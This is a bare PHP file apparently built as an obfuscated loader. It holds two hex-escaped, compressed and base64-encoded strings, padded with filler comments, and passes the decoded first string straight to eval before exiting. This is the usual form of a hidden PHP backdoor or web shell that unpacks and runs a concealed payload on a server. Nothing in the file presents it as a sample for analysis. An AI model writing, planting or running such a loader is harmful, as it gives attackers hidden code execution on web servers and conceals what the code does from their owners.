<?php
/* AAAAAAAAAAAAA */
$Cyto = "Sy1LzNFQKyzNL7G2V0svsYYw9YpLiuKL8ksMjTXSqzLz0nISS1K\x42rNK85Pz\x63gqLU4mLq\x43\x43\x63lFqe\x61m\x63Snp\x43\x62np6Rq\x41O0sSi3TUPHJrNBE\x41tY\x41";
/* AAAAAAAAAAAAA */
$Lix = "\x3ds\x2bWjf\x62SVJFo\x633EP2foR8q\x62\x41/1XSmirtu1jiP8\x42k\x63oUWTtJ0OHgg\x43quw8Epj8G\x42h00qywe1rL5S/o2\x2bpYjrDyVv1\x41e\x42dRX\x418t//IZ\x2bf2f7iwSWxr\x62kQmp\x43hp3W5Pms\x41xVRZ1nxJp6J/R\x62wGwQ0IE\x42\x61jwpZuLewYMmVduY\x2bGDV3p\x43\x42n2\x61pLu\x42v\x61Mkq\x2bXQkoYPLtmun28\x41\x42F\x41\x433J49ER\x42MDqQQN22/s\x42wk\x42wJe/HG\x41eGw/\x63\x42wo\x42wJe/HF\x41uGw/M\x42ws\x42wJe/HE\x41\x2bGw/8\x41ww\x42wJe";
/* AAAAAAAAAAAAA */
eval(htmlspecialchars_decode(gzinflate(base64_decode($Cyto))));
/* AAAAAAAAAAAAA */
exit;
/* AAAAAAAAAAAAA */
?>
